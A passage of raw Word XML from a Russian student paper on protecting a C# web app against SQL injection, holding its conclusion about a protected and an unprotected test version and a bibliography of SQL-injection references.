          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> одинаковыми формами для поиска уроков в базе данных приложения. Первая </w:t>
      </w:r>
      <w:r w:rsidR="005359E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>версия</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> защищена, рассмотренными методами защиты от внедрения sql-инъекций. </w:t>
      </w:r>
      <w:r w:rsidR="00D117CB" w:rsidRPr="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">торая </w:t>
      </w:r>
      <w:r w:rsidR="005359E8" w:rsidRPr="005359E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">версия </w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">не защищена и имеет слабые места, через которые были извлечены данные, не являющиеся доступными обычному пользователю. Эти данные </w:t>
      </w:r>
      <w:r w:rsidR="00B177A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">были придуманы и </w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>состояли из таких данных как</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB" w:rsidRPr="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> адреса, номера телефонов, имёна вымышленных пользователей нашего приложения. </w:t>
      </w:r>
      <w:r w:rsidR="00B177A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом с помощью описанных в этой работе методов внедрения sql-инъекций были извлечены конфид</w:t>
      </w:r>
      <w:r w:rsidR="0097556D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>енциальные данные пользователей</w:t>
      </w:r>
      <w:r w:rsidR="00B177A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, что для коммерческих сайтов было бы огромной проблемой, так как эти данные могли быть использованы злоумышленником в преступных целях. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670F38" w:rsidRDefault="00B177A9" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Описанные способы защиты сайтов и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> от внедрения sql-инъекций являются простыми и надёжными. Хоть и рассмотрены они только для одного поставщика </w:t>
      </w:r>
      <w:r w:rsidR="00DF2EA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>СУБД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и конкретного языка высокого уровня C#, они </w:t>
      </w:r>
      <w:r w:rsidR="00617BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вляются универсальными для любого поставщика и языка высокого уровня. Различия имеются только в синтаксисе написания кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2EA2" w:rsidRPr="00BF7C2C" w:rsidRDefault="00DF2EA2" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки внедрением</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql-</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">кода </w:t>
      </w:r>
      <w:r w:rsidR="00BF7C2C" w:rsidRPr="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>остаютс</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">я наиболее опасными видами атак на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сайтов работающих с базами данных. </w:t>
      </w:r>
      <w:r w:rsidR="00617BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">гнорирование методов защиты может привести к утечке конфиденциальных данных, что может повлечь за собой большие проблемы для администраторов и самих пользователей этого сайта или </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложения</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF7C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B177A9" w:rsidRPr="00B177A9" w:rsidRDefault="00B177A9" w:rsidP="00D117CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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020A8D" w:rsidRPr="00D21A0A" w:rsidRDefault="00020A8D" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc420429540"/>
      <w:bookmarkStart w:id="22" w:name="_Toc420854442"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="005678D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A02D75" w:rsidRPr="009B2356" w:rsidRDefault="00A02D75" w:rsidP="009B2356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection: https://technet.microsoft.com/. -URL: https://technet.microsoft.com/ru-ru/library/ms161953(v=sql.105).aspx</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Написание защищенного динамического SQL-кода в SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ADO.NET) : http</w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s://msdn.microsoft.com/ru-ru/</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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https://msdn.microsoft.com/ru-ru/library/vstudio/bb669091(v=vs.100).aspx</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Противодействие атакам, использующим </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-инъекции: http://www.ibm.com/developerworks/ru/. -</w:t>
      </w:r>
      <w:r w:rsidRPr="006A740F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2014.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www</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ibm</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com</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developerworks</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library</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se</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injection</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attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02D75"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слепые </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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>иънекции</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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programguru</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 xml:space="preserve">/. – 2014. –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programguru</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BD</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w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2%</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1%81%</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1%82%</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w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slepye</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inekcii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</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 xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADO</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 xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-инъекции: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professorweb</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00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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professorweb</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my</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ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</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base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level</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6/6_3.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006A740F" w:rsidRPr="009B2356" w:rsidRDefault="006A740F" w:rsidP="009B2356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EvilSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : http://www.evilsql.com/main/index.php/. -URL: http://www.evilsql.com/main/page1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="009B2356" w:rsidRDefault="00A02D75" w:rsidP="009B2356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection: http://www.w3schools.com. -URL:  http://www.w3schools.com/sql/sql_injection.asp</w:t>
      </w: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BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc420429541"/>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00A92A4F" w:rsidRDefault="00BF7C2C" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc420429542"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRDefault="00BF7C2C" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc420854443"/>
